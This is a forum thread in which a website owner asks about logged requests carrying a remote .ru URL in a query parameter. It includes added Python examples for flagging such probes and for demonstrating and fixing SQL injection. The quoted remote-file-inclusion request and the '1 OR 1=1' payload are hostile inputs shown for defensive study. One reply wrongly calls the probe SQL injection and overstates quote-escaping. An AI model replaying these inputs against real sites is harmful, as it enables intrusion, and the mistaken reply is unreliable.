
Suspicious 403 errors

  • 17-01-2008 5:45pm
    #1
    Registered Users, Registered Users 2 Posts: 58 ✭✭


    Hello all,

    I run a few small websites part time, and recently I've been receiving a lot of 403 errors for some pages on my sites. I'm not sure exactly what to do with them, or if there's any need to worry about them, but having read so much recently about websites being hijacked and malicious code placed on them I thought I'd ask the experts what they thought!

    An example of the errors I'm receiving is:
    Time of the error:  January 15 07:00pm
     
    browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
     
    Page Requested: www.jamesgcoughlan.com/res_prop.php?action=http://nsmsisoeueeitsdwfdfhfrdefaiss.land.ru/.html/head?
     
    Referer: 
     
    IP Address: 99.228.146.12
     
    Hostname: CPE0013461d9ac5-CM0019474d788a.cpe.net.cable.rogers.com
    

    The action=http://... is always some strange long address with a .ru domain, while the IP address seems to constantly change. I'm getting a few of these per day, and I'm not sure what I should do (if anything). So far I haven't noticed any code changes or new iframes popping up on the site, but I'd appreciate any advice that anyone might have.

    Thanks!
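The distinguishing feature of the requests in the report above is a query parameter whose value is itself a full URL. The following is an added example, not code from the thread: a small Python log checker that pulls the query string out of a "Page Requested" value, percent-decodes each parameter, and flags any whose value starts with a remote scheme. The sample requests and hostnames are constructed placeholders, not the real addresses from the post.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample "Page Requested" values in the shape of the report above.
# Hostnames are placeholders, not the real addresses from the log.
SAMPLE_REQUESTS = [
    "www.example.invalid/res_prop.php?action=http://remote.example.invalid/.html/head?",
    "www.example.invalid/res_prop.php?action=view&id=7",
    "www.example.invalid/index.php?page=ftp://remote.example.invalid/x.txt",
    "www.example.invalid/about.php",
    "www.example.invalid/res_prop.php?action=%68ttp://remote.example.invalid/",
]

# A parameter value that is itself an absolute URL is the hallmark of a
# remote-file-inclusion probe: the bot hopes the script will include() it.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def remote_url_params(request: str) -> list[tuple[str, str]]:
    """Return (name, value) pairs of query parameters whose value is a remote URL.

    parse_qsl percent-decodes values before we look at them, so an encoded
    scheme such as %68ttp:// is inspected in its decoded form.
    """
    _, _, query = request.partition("?")
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if REMOTE_URL.match(value)
    ]


def flag_requests(requests: list[str]) -> list[tuple[str, list[tuple[str, str]]]]:
    """Keep only the requests that carry at least one remote-URL parameter."""
    flagged = []
    for request in requests:
        hits = remote_url_params(request)
        if hits:
            flagged.append((request, hits))
    return flagged


if __name__ == "__main__":
    for request, hits in flag_requests(SAMPLE_REQUESTS):
        print(request)
        for name, value in hits:
            print(f"  {name} -> {value}")
```

Run over a day's worth of "Page Requested" values, the flagged list tells you how many of the errors are this one probe pattern; a script that never passes a parameter to include() or fopen() is not at risk from it, and the same check is a reasonable basis for a blocking rule in a web application firewall.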


Comments

  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Well, it looks like a malicious program of sorts.
    Possibly looking for web proxies, analysing the return codes. (Or bad PHP programming, in the way it parses the arguments.)

    I wonder what would happen if returning a 200 code - just to see how it would react... but that might invite a whole lot of unwanted trouble too.


  • Registered Users, Registered Users 2 Posts: 58 ✭✭spooner_j


    So is it safe to just ignore it? Or is there anything else I need to do?


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    It's probably looking to exploit a version of phpBB - unless you have it installed, it's maybe OK to ignore.
    But it wouldn't be a bad idea to install mod_security.


  • Registered Users, Registered Users 2 Posts: 1,530 ✭✭✭CptSternn


    First, that's a 404 - not a 403. A 403 is a denied directory listing. ;)

    Anyway, what you're seeing there is a bot (an automated script) that is hitting your site looking for bad code which it can use to exploit in a SQL injection attack.

    Thanks to Google, you can search for filenames these days like:

    post_add.php

    email_add.asp

    ...and others that are default filenames for many popular packages as well as popular filenames for even custom built sites. The script is looking for a page that uses the querystring request type to pass information, then passes a string that will somehow alter the form on the other end.

    Most people don't realise that their database back-end is very susceptible to these sort of attacks.

    For example:

    Let's say you have a site with multiple articles posted and the user can select an article and view it. The page name is:

    article.asp

    When the user clicks it, it sends the following to the form:

    article.asp?id=1

    If the code on the other end is open and doesn't check the query string for control codes, a hacker can then inject their own statement like so:

    article.asp?id=1 or if 1 = 1 then change password for admin to 1234

    Now, that's not an exact example; the spaces would be replaced with ASCII codes, and of course that's by no means the real SQL commands you would use to change the server admin password. I just used that as an example.

    So on the form end, the code would look something like this:

    SELECT * FROM TABLENAME WHERE ID = querystring.variable OR IF 1=1 Then *do whatever the hacker wants the server to do*

    It's quite common these days. I host a few dozen sites on my servers and get a dozen or so of these A DAY. Most of them come from China. There is nothing you can do to stop it, not that it matters because if your code is good they won't cause any problems.

    Just make sure you do not have any SQL statements that include variables that are not checked (i.e. make sure to replace any quotes ' in the statement to keep hackers from passing injection attacks, and also set the variable type so they can't pass a string in a variable that is supposed to be a numeral).

    I hope that makes sense - I tried to explain it in a language-less format that any programmer can understand. :)
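The article.asp?id=1 example in the post above, worked through in runnable form. This is an added example and not the poster's code; it uses Python with an in-memory SQLite table (constructed) instead of ASP, and the table and function names are assumptions. It shows the three versions of the lookup the post is contrasting: the unchecked one, one that only doubles single quotes, and one that enforces the integer type and binds the value as a query parameter.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory article table standing in for the site's database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO articles (id, title) VALUES (?, ?)",
        [(1, "First post"), (2, "Second post"), (3, "Third post")],
    )
    return conn


def fetch_article_unchecked(conn: sqlite3.Connection, raw_id: str) -> list:
    """Vulnerable: the query string value is pasted straight into the SQL."""
    sql = "SELECT id, title FROM articles WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def fetch_article_quote_escaped(conn: sqlite3.Connection, raw_id: str) -> list:
    """Still vulnerable: doubling quotes only helps inside a quoted string.

    The id sits in the SQL as a bare number, so a payload needs no quote at
    all; this is why the post also insists on setting the variable type.
    """
    sql = "SELECT id, title FROM articles WHERE id = " + raw_id.replace("'", "''")
    return conn.execute(sql).fetchall()


def fetch_article_checked(conn: sqlite3.Connection, raw_id: str):
    """Hardened: enforce the integer type, then bind the value as a parameter.

    Returns None for input that is not a whole number; the caller should turn
    that into a 400 response instead of running any query.
    """
    try:
        article_id = int(raw_id)
    except ValueError:
        return None
    # The driver sends the value separately from the SQL text, so it is never
    # parsed as part of the statement no matter what it contains.
    return conn.execute(
        "SELECT id, title FROM articles WHERE id = ?", (article_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    payload = "1 OR 1=1"  # the post's "id=1 or if 1 = 1" idea, in real SQL
    print("unchecked:", fetch_article_unchecked(db, payload))      # every row
    print("escaped:  ", fetch_article_quote_escaped(db, payload))  # still every row
    print("checked:  ", fetch_article_checked(db, payload))        # None: rejected
    print("checked:  ", fetch_article_checked(db, "2"))            # one row
```

The type check and the parameter binding are independent defences: the first rejects input that could never be a valid id, the second guarantees that whatever does reach the database is data, not SQL. The same shape applies in any language with a parameterised query API.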

